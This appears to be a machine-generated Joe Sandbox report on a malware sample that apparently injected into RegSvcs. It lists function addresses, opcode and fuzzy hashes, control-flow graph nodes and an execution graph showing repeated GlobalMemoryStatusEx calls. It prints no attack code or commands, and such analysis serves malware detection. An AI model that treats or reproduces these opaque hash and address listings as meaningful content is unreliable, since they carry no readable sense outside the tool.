                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2b6fd685c49ac22da06ec00b9742040ab3be1a455fda9a4073a6b336cac857a
                            • Instruction ID: 3d149a97414d1496eb0b3a4bd8cd9cbb2bbd22c381beae3f5bcad335f6e87fbc
                            • Opcode Fuzzy Hash: d2b6fd685c49ac22da06ec00b9742040ab3be1a455fda9a4073a6b336cac857a
                            • Instruction Fuzzy Hash: A121F471900240DFDB05DF58D984B27BFA5FB88319F20C56AD9090A266C336D416CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014ED3D8 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c6b20f200477389a6490978ac8ac0f4bc89ed8ec5b6a6f22a75bb419ad58665
                            • Instruction ID: 060c614b5eea12301bd71c89bca32ffa1a9cd42a1497a93cbd6a8c729dc7611c
                            • Opcode Fuzzy Hash: 8c6b20f200477389a6490978ac8ac0f4bc89ed8ec5b6a6f22a75bb419ad58665
                            • Instruction Fuzzy Hash: C7210871900204DFDB05DF54D9C4B57BFA5FBA4315F20C57AD9090B366C33AE456CAA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014FD01C Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133001232.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14fd000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 30123cb4dc4a9ca83225ed329e0bab3be4eb130e106836371b8bf2666107ffa7
                            • Instruction ID: 9c3b51111aa506c74b222bdbb219c232e1960ed056037b852b77b5addf2a4355
                            • Opcode Fuzzy Hash: 30123cb4dc4a9ca83225ed329e0bab3be4eb130e106836371b8bf2666107ffa7
                            • Instruction Fuzzy Hash: FA21F5B1904204DFDB15DF68D984B16BF65FB84358F20C56EDA0A4B366C33AD407CA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014FD1D4 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133001232.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14fd000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 88a15618b816fff7a327c094e9d25f6790264fb42ff26c7743dab7a258157fbd
                            • Instruction ID: c5a9752ac843402543d7256dc1234dfa2763d8f5aa3404708d064983e886f745
                            • Opcode Fuzzy Hash: 88a15618b816fff7a327c094e9d25f6790264fb42ff26c7743dab7a258157fbd
                            • Instruction Fuzzy Hash: BE210775904204DFDB05DF98D9C0F26BB65FB84324F20C56EDA094B366C33AD406CAA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014FD006 Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133001232.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14fd000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b9b91d5a0b6d29bdd3192348528539be7ceea700f57cc6d7dd91b1e5908d8759
                            • Instruction ID: 92b11347fb5bbe8cd86dc727de34946a045461bf44089191b299ee1ed4984a44
                            • Opcode Fuzzy Hash: b9b91d5a0b6d29bdd3192348528539be7ceea700f57cc6d7dd91b1e5908d8759
                            • Instruction Fuzzy Hash: 6D217F755093808FDB07CF24D594716BF71EB46218F28C5EAD9498B7A7C33A980ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014ED3D3 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction ID: ece6305b994b0ee47d02620bf69e0708c51d8c3360ae735cad7a17de8fa4a5dc
                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction Fuzzy Hash: 8711D276804240CFDB02CF44D5C4B56BFB1FB94314F24C6AAD9490B267C33AD456CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014ED4BF Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction ID: bdba0f2de526536ea5f19cb0adc31fe9deef51145ee8a699610715d3bc5f3a41
                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction Fuzzy Hash: 0911B176904280CFDB16CF54D9C4B16BFB1FB88314F24C6AAD9490B667C336D45ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014FD1CF Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133001232.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14fd000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction ID: a8eff1e04315feab8b3f4ae8f5be954c5d67cf86a14e8c300812fe8115819dd8
                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction Fuzzy Hash: 4C11BE79904240DFDB02CF54C5C4B16BF61FB84224F24C6AED9494B366C33AD40ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014ED745 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 003aefc496d3f7cd03b9094b55f79cdf812baaf2ea2dea1591b204d1a01e00c2
                            • Instruction ID: e13515f98d3ac9574b8c48c6187e3e28f9faef27aefe22a0e800d370617301e8
                            • Opcode Fuzzy Hash: 003aefc496d3f7cd03b9094b55f79cdf812baaf2ea2dea1591b204d1a01e00c2
                            • Instruction Fuzzy Hash: 51012B314443809AE7209F99CD88B67FFDCEF45321F18C52BED490A3A6D2399841CAB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014ED744 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2132939901.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_14ed000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23ba8e17d3e25bb4fa8a1fcd7f7aafc880c5377e07e6b52cec222a0db597c4ab
                            • Instruction ID: 9beaa7baf785af9b3b0f46eeac0fa71b46406d2e47a9bab539314d593299990f
                            • Opcode Fuzzy Hash: 23ba8e17d3e25bb4fa8a1fcd7f7aafc880c5377e07e6b52cec222a0db597c4ab
                            • Instruction Fuzzy Hash: 67F0C2714043849AE7108F1AC888B63FFD8EF85635F18C45AED484A396C2799840CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:12.1%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:29
                            Total number of Limit Nodes:5
                            execution_graph 26787 1220848 26789 122084e 26787->26789 26788 122091b 26789->26788 26792 1221383 26789->26792 26797 1221488 26789->26797 26794 1221396 26792->26794 26793 1221484 26793->26789 26794->26793 26796 1221488 4 API calls 26794->26796 26803 1227090 26794->26803 26796->26794 26799 1221396 26797->26799 26800 122148f 26797->26800 26798 1221484 26798->26789 26799->26798 26801 1227090 4 API calls 26799->26801 26802 1221488 4 API calls 26799->26802 26800->26789 26801->26799 26802->26799 26804 122709a 26803->26804 26805 12270d7 26804->26805 26810 62ccfa0 26804->26810 26814 62ccfb0 26804->26814 26805->26794 26806 12270b4 26806->26805 26818 62ce34f 26806->26818 26811 62ccfaa 26810->26811 26812 62cd1da 26811->26812 26813 62cd608 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26811->26813 26812->26806 26813->26811 26815 62ccfc5 26814->26815 26816 62cd1da 26815->26816 26817 62cd608 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26815->26817 26816->26806 26817->26815 26819 62ce30b GlobalMemoryStatusEx 26818->26819 26821 62ce356 26818->26821 26820 62ce31e 26819->26820 26820->26805 26821->26805 26821->26821

                            Executed Functions

                            Function 01229B38 Relevance: 3.1, Instructions: 3107COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 665dea7de9f32fd40af2264f8410bf9b84b439b42e52a88c336774cc949daef9
                            • Instruction ID: 231b8c2e6d2a9d20934a7de29222b7baf1df205960c7a4aabf663f72a381e264
                            • Opcode Fuzzy Hash: 665dea7de9f32fd40af2264f8410bf9b84b439b42e52a88c336774cc949daef9
                            • Instruction Fuzzy Hash: E8630A31D10B1A8EDB11EF68C9906ADF7B1FF99300F15D69AE44867221EB70AAD4CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01224A98 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1825 1224a98-1224afe 1827 1224b00-1224b0b 1825->1827 1828 1224b48-1224b4a 1825->1828 1827->1828 1829 1224b0d-1224b19 1827->1829 1830 1224b4c-1224b65 1828->1830 1831 1224b1b-1224b25 1829->1831 1832 1224b3c-1224b46 1829->1832 1836 1224bb1-1224bb3 1830->1836 1837 1224b67-1224b73 1830->1837 1834 1224b27 1831->1834 1835 1224b29-1224b38 1831->1835 1832->1830 1834->1835 1835->1835 1838 1224b3a 1835->1838 1839 1224bb5-1224bcd 1836->1839 1837->1836 1840 1224b75-1224b81 1837->1840 1838->1832 1847 1224c17-1224c19 1839->1847 1848 1224bcf-1224bda 1839->1848 1841 1224b83-1224b8d 1840->1841 1842 1224ba4-1224baf 1840->1842 1843 1224b91-1224ba0 1841->1843 1844 1224b8f 1841->1844 1842->1839 1843->1843 1846 1224ba2 1843->1846 1844->1843 1846->1842 1849 1224c1b-1224c33 1847->1849 1848->1847 1850 1224bdc-1224be8 1848->1850 1857 1224c35-1224c40 1849->1857 1858 1224c7d-1224c7f 1849->1858 1851 1224bea-1224bf4 1850->1851 1852 1224c0b-1224c15 1850->1852 1854 1224bf6 1851->1854 1855 1224bf8-1224c07 1851->1855 1852->1849 1854->1855 1855->1855 1856 1224c09 1855->1856 1856->1852 1857->1858 1859 1224c42-1224c4e 1857->1859 1860 1224c81-1224d08 1858->1860 1861 1224c50-1224c5a 1859->1861 1862 1224c71-1224c7b 1859->1862 1870 1224d11-1224d31 1860->1870 1871 1224d0a-1224d10 1860->1871 1863 1224c5e-1224c6d 1861->1863 1864 1224c5c 1861->1864 1862->1860 1863->1863 1866 1224c6f 1863->1866 1864->1863 1866->1862 1875 1224d3b-1224d71 1870->1875 1871->1870 1878 1224d73-1224d77 1875->1878 1879 1224d81-1224d85 1875->1879 1878->1879 1880 1224d79 1878->1880 1881 1224d87-1224d8b 1879->1881 1882 1224d95-1224d99 1879->1882 1880->1879 1881->1882 1883 1224d8d 1881->1883 1884 1224d9b-1224d9f 1882->1884 1885 1224da9-1224dad 1882->1885 1883->1882 1884->1885 1886 1224da1 1884->1886 1887 1224daf-1224db3 1885->1887 1888 1224dbd-1224dc1 1885->1888 1886->1885 1887->1888 1889 1224db5 1887->1889 1890 1224dc3-1224dc7 1888->1890 1891 1224dd1-1224dd5 1888->1891 1889->1888 1890->1891 1892 1224dc9-1224dcc call 1220ab8 1890->1892 1893 1224dd7-1224ddb 1891->1893 1894 1224de5 1891->1894 1892->1891 1893->1894 1896 1224ddd-1224de0 call 1220ab8 1893->1896 1898 1224de6 1894->1898 1896->1894 1898->1898
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: ee51ce86a56c47b3e9824a5ba4397f2b9ddce4729528eaccfc1d067d6a4b7c14
                            • Instruction ID: cd5417819a580601cd5c2b081833efb906c0c07a6345edb22c11e19a485f65b1
                            • Opcode Fuzzy Hash: ee51ce86a56c47b3e9824a5ba4397f2b9ddce4729528eaccfc1d067d6a4b7c14
                            • Instruction Fuzzy Hash: 81B16F70E1025ADFDF10DFADC9817ADBBF2AF88314F148129D919E7254EB749885CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01223E80 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1974 1223e80-1223ee6 1976 1223f30-1223f32 1974->1976 1977 1223ee8-1223ef3 1974->1977 1979 1223f34-1223f8c 1976->1979 1977->1976 1978 1223ef5-1223f01 1977->1978 1980 1223f03-1223f0d 1978->1980 1981 1223f24-1223f2e 1978->1981 1988 1223fd6-1223fd8 1979->1988 1989 1223f8e-1223f99 1979->1989 1982 1223f11-1223f20 1980->1982 1983 1223f0f 1980->1983 1981->1979 1982->1982 1985 1223f22 1982->1985 1983->1982 1985->1981 1991 1223fda-1223ff2 1988->1991 1989->1988 1990 1223f9b-1223fa7 1989->1990 1992 1223fca-1223fd4 1990->1992 1993 1223fa9-1223fb3 1990->1993 1998 1223ff4-1223fff 1991->1998 1999 122403c-122403e 1991->1999 1992->1991 1994 1223fb7-1223fc6 1993->1994 1995 1223fb5 1993->1995 1994->1994 1997 1223fc8 1994->1997 1995->1994 1997->1992 1998->1999 2000 1224001-122400d 1998->2000 2001 1224040-122408e 1999->2001 2002 1224030-122403a 2000->2002 2003 122400f-1224019 2000->2003 2009 1224094-12240a2 2001->2009 2002->2001 2005 122401b 2003->2005 2006 122401d-122402c 2003->2006 2005->2006 2006->2006 2007 122402e 2006->2007 2007->2002 2010 12240a4-12240aa 2009->2010 2011 12240ab-122410b 2009->2011 2010->2011 2018 122411b-122411f 2011->2018 2019 122410d-1224111 2011->2019 2020 1224121-1224125 2018->2020 2021 122412f-1224133 2018->2021 2019->2018 2022 1224113 2019->2022 2020->2021 2023 1224127-122412a call 1220ab8 2020->2023 2024 1224143-1224147 2021->2024 2025 1224135-1224139 2021->2025 2022->2018 2023->2021 2028 1224157-122415b 2024->2028 2029 1224149-122414d 2024->2029 2025->2024 2027 122413b-122413e call 1220ab8 2025->2027 2027->2024 2032 122416b-122416f 2028->2032 2033 122415d-1224161 2028->2033 2029->2028 2031 122414f-1224152 call 1220ab8 2029->2031 2031->2028 2034 1224171-1224175 2032->2034 2035 122417f 2032->2035 2033->2032 2037 1224163 2033->2037 2034->2035 2038 1224177 2034->2038 2039 1224180 2035->2039 2037->2032 2038->2035 2039->2039
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: 603dfc94a939c46407f0de115d21834329723926a79f318f4abec6f994d8d6c7
                            • Instruction ID: a1f5f66d1169d535451144de84ecdcedfa9570dcb1f2c52d021204d1961e8ffb
                            • Opcode Fuzzy Hash: 603dfc94a939c46407f0de115d21834329723926a79f318f4abec6f994d8d6c7
                            • Instruction Fuzzy Hash: E291A270E1025AEFDF14DFA8D9817DDBBF2BF98304F248129E505A7254DB789886CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122CEC0 Relevance: 2.3, Instructions: 2308COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57403622dd3778b89b730af39173ce112e99f3eec7686404c326b5c756690bfe
                            • Instruction ID: 471b0fc4122ead6e3ea378974f5e41c41cde269adf4ae017eaf06fbe54e3199f
                            • Opcode Fuzzy Hash: 57403622dd3778b89b730af39173ce112e99f3eec7686404c326b5c756690bfe
                            • Instruction Fuzzy Hash: 24332031D1071A9ECB11EF68C8906ADF7B1FF99300F15C79AD449A7221EB70AAD5CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01229378 Relevance: .6, Instructions: 612COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aa2978ada8695527f37b861e8df32723d8f4d55687054458fa1631393357b1a3
                            • Instruction ID: 38e13a3be26cfdd5bdd86f1c4c5ac61fc57827b9ad98e74f83283fa9baaa81a6
                            • Opcode Fuzzy Hash: aa2978ada8695527f37b861e8df32723d8f4d55687054458fa1631393357b1a3
                            • Instruction Fuzzy Hash: 8A32A034A102269FDF14DF68D584AADBBB6FF88314F148569E909DB395DB30EC81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 062CE34F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 251COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 760 62ce34f-62ce354 761 62ce30b-62ce31c GlobalMemoryStatusEx 760->761 762 62ce356-62ce382 760->762 763 62ce31e-62ce324 761->763 764 62ce325-62ce34d 761->764 766 62ce384-62ce387 762->766 763->764 768 62ce38d-62ce390 766->768 769 62ce476-62ce478 766->769 771 62ce3ac-62ce3af 768->771 772 62ce392-62ce3a5 768->772 773 62ce47e 769->773 774 62ce793-62ce7ce 769->774 777 62ce3d7-62ce3da 771->777 778 62ce3b1-62ce3d2 771->778 775 62ce3a7 772->775 776 62ce403-62ce40a 772->776 779 62ce483-62ce486 773->779 817 62ce7e0 774->817 818 62ce7d0-62ce7de 774->818 775->771 780 62ce40f-62ce412 776->780 784 62ce3dc-62ce3f9 777->784 785 62ce3fe-62ce401 777->785 778->777 782 62ce49d-62ce4a0 779->782 783 62ce488-62ce492 779->783 788 62ce42e-62ce431 780->788 789 62ce414-62ce429 780->789 786 62ce4a2-62ce4ce 782->786 787 62ce4d3-62ce4d6 782->787 804 62ce498 783->804 805 62ce552-62ce573 783->805 784->785 785->776 785->780 786->787 792 62ce4ee-62ce4f1 787->792 793 62ce4d8-62ce4e9 787->793 794 62ce44e-62ce451 788->794 795 62ce433-62ce449 788->795 789->788 800 62ce54d-62ce550 792->800 801 62ce4f3-62ce548 792->801 793->792 798 62ce471-62ce474 794->798 799 62ce453-62ce46c call 62c1b54 794->799 795->794 798->769 798->779 799->798 800->805 807 62ce578-62ce57b 800->807 801->800 804->782 805->807 813 62ce57d-62ce58b 807->813 814 62ce590-62ce593 807->814 813->814 821 62ce5ab-62ce5ae 814->821 822 62ce595-62ce5a6 814->822 826 62ce7e8-62ce7fd 817->826 818->826 823 62ce5c5-62ce5c8 821->823 824 62ce5b0-62ce5c0 821->824 822->821 831 62ce5ca-62ce612 823->831 832 62ce617-62ce61a 823->832 824->823 849 62ce80f 826->849 850 62ce7ff-62ce80d 826->850 831->832 834 62ce61c-62ce623 832->834 835 62ce626-62ce629 832->835 839 62ce62b-62ce632 835->839 840 62ce637-62ce63a 835->840 839->840 842 62ce63c-62ce641 840->842 843 62ce644-62ce647 840->843 842->843 846 62ce649-62ce665 843->846 847 62ce66a-62ce66d 843->847 846->847 852 62ce66f-62ce685 847->852 853 62ce68a-62ce68d 847->853 859 62ce817-62ce87e 849->859 850->859 852->853 854 62ce69e-62ce6a0 853->854 855 62ce68f-62ce693 853->855 861 62ce6a7-62ce6aa 854->861 862 62ce6a2 854->862 855->774 860 62ce699 855->860 885 62ce885-62ce892 859->885 860->854 861->766 865 62ce6b0-62ce6bf 861->865 862->861 872 62ce77b-62ce790 865->872 873 62ce6c5-62ce775 call 62c1b54 865->873 872->774 873->872 889 62ce89f 885->889 890 62ce894-62ce899 885->890 891 62ce8a0 889->891 890->889 891->891
                            APIs
                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,062CE222), ref: 062CE30F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3285125303.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_62c0000_RegSvcs.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID: Te]q
                            • API String ID: 1890195054-52440209
                            • Opcode ID: e7420c9b46ce50c389c37e20b1338045e15bd2de189df37c9260a7326cf22497
                            • Instruction ID: 1ff4a5bd1d8198fb60510f077a5e840ee2471335ddce9091f9d7871984556cd3
                            • Opcode Fuzzy Hash: e7420c9b46ce50c389c37e20b1338045e15bd2de189df37c9260a7326cf22497
                            • Instruction Fuzzy Hash: 5D91B035E102198FDB24DFA9C4807ADB7B2EF89314F214629E845EB355CB35EC86CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 062CE1D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 899 62ce1d0-62ce1db 900 62ce1dd-62ce204 call 62cd5a8 899->900 901 62ce205-62ce224 call 62cd5b4 899->901 907 62ce22a-62ce25d 901->907 908 62ce226-62ce229 901->908 913 62ce25f-62ce289 907->913 916 62ce28f-62ce2a4 913->916 917 62ce28b-62ce28e 913->917 916->913 919 62ce2a6-62ce31c GlobalMemoryStatusEx 916->919 922 62ce31e-62ce324 919->922 923 62ce325-62ce34d 919->923 922->923
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3285125303.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_62c0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS
                            • API String ID: 0-647291951
                            • Opcode ID: b092cabd3f5858aa70e00dbef48f4ba062f8be0597443b72f4a7286ca3a41b0d
                            • Instruction ID: 9dc9021c9abb07cde8965d22a388e2a7562269b2fc9dab17eb8b2b7fb42ae80c
                            • Opcode Fuzzy Hash: b092cabd3f5858aa70e00dbef48f4ba062f8be0597443b72f4a7286ca3a41b0d
                            • Instruction Fuzzy Hash: 7B412572D103568FCB14DFB9D8502EEBBF5EF89320F05866AD848A7241DB78A845CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 062CD5B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 926 62cd5b4-62ce31c GlobalMemoryStatusEx 930 62ce31e-62ce324 926->930 931 62ce325-62ce34d 926->931 930->931
                            APIs
                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,062CE222), ref: 062CE30F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3285125303.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_62c0000_RegSvcs.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID: kfS
                            • API String ID: 1890195054-647291951
                            • Opcode ID: 66d5032d3a7f1ef1aa4f0c935db5c95fa1742f8182a2f6b975b8fac668d3c200
                            • Instruction ID: 2613445303ae329ceb0f996c9cea1b9f5e80a831dd82b6dc321c005d44776f7e
                            • Opcode Fuzzy Hash: 66d5032d3a7f1ef1aa4f0c935db5c95fa1742f8182a2f6b975b8fac668d3c200
                            • Instruction Fuzzy Hash: F11133B1C106599BDB10DF9AC444BEEFBF4EF08320F11822AD818A7240D378A944CFE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01224A8D Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1899 1224a8d-1224afe 1902 1224b00-1224b0b 1899->1902 1903 1224b48-1224b4a 1899->1903 1902->1903 1904 1224b0d-1224b19 1902->1904 1905 1224b4c-1224b65 1903->1905 1906 1224b1b-1224b25 1904->1906 1907 1224b3c-1224b46 1904->1907 1911 1224bb1-1224bb3 1905->1911 1912 1224b67-1224b73 1905->1912 1909 1224b27 1906->1909 1910 1224b29-1224b38 1906->1910 1907->1905 1909->1910 1910->1910 1913 1224b3a 1910->1913 1914 1224bb5-1224bcd 1911->1914 1912->1911 1915 1224b75-1224b81 1912->1915 1913->1907 1922 1224c17-1224c19 1914->1922 1923 1224bcf-1224bda 1914->1923 1916 1224b83-1224b8d 1915->1916 1917 1224ba4-1224baf 1915->1917 1918 1224b91-1224ba0 1916->1918 1919 1224b8f 1916->1919 1917->1914 1918->1918 1921 1224ba2 1918->1921 1919->1918 1921->1917 1924 1224c1b-1224c33 1922->1924 1923->1922 1925 1224bdc-1224be8 1923->1925 1932 1224c35-1224c40 1924->1932 1933 1224c7d-1224c7f 1924->1933 1926 1224bea-1224bf4 1925->1926 1927 1224c0b-1224c15 1925->1927 1929 1224bf6 1926->1929 1930 1224bf8-1224c07 1926->1930 1927->1924 1929->1930 1930->1930 1931 1224c09 1930->1931 1931->1927 1932->1933 1934 1224c42-1224c4e 1932->1934 1935 1224c81-1224cb7 1933->1935 1936 1224c50-1224c5a 1934->1936 1937 1224c71-1224c7b 1934->1937 1943 1224cbf-1224cf4 1935->1943 1938 1224c5e-1224c6d 1936->1938 1939 1224c5c 1936->1939 1937->1935 1938->1938 1941 1224c6f 1938->1941 1939->1938 1941->1937 1944 1224cfa-1224d08 1943->1944 1945 1224d11-1224d1f 1944->1945 1946 1224d0a-1224d10 1944->1946 1949 1224d27-1224d31 1945->1949 1946->1945 1950 1224d3b-1224d71 1949->1950 1953 1224d73-1224d77 1950->1953 1954 1224d81-1224d85 1950->1954 1953->1954 1955 1224d79 1953->1955 1956 1224d87-1224d8b 1954->1956 1957 1224d95-1224d99 1954->1957 1955->1954 1956->1957 1958 1224d8d 1956->1958 1959 1224d9b-1224d9f 1957->1959 1960 1224da9-1224dad 1957->1960 1958->1957 1959->1960 1961 1224da1 1959->1961 1962 1224daf-1224db3 1960->1962 1963 1224dbd-1224dc1 1960->1963 1961->1960 1962->1963 1964 1224db5 1962->1964 1965 1224dc3-1224dc7 1963->1965 1966 1224dd1-1224dd5 1963->1966 1964->1963 1965->1966 1967 1224dc9-1224dcc call 1220ab8 